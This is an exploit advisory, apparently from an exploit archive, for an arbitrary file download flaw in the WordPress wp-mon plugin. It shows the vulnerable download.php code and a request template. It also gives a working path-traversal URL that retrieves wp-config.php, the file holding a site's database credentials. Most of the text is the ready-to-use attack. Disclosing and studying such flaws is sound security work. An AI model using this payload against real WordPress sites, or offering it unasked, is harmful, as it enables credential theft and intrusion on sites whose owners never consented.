WordPress WP-Mon plugin suffers from an arbitrary file disclosure vulnerability.
4d1770940cecf45c0e9b92a8e2c05a7ec722c48648c44835feacd66a4247719f
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|-------------------------------------------------------------------------|
| [+] Exploit Title:Wordpress wp-mon Plugin Arbitrary File Download
Vulnerability |
| [+] Exploit Author: Ashiyane Digital Security Team |
| [+] Vendor Homepage : https://wordpress.org/plugins/wp-mon/
| [+] Download Link : https://downloads.wordpress.org/plugin/wp-mon.zip
| [+] Tested on : Windows,Linux |
| [+] Date : 2015-04-16
| [+] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
| [+] Exploit: |
| [+] Vulnerable file :
http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php
|
| [+] Vulnerable Code :
<?php
header( 'Content-Type: ' . $_GET['type'] );
header( 'Content-Disposition: attachment; filename="' . $_GET['name']
. '"' );
readfile( $_GET['path'] . DIRECTORY_SEPARATOR . $_GET['name'] );
?>
| [+]
http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=[File Address]&name=[File
Name]
| [+]
| [+] Examples :
http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php
|-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|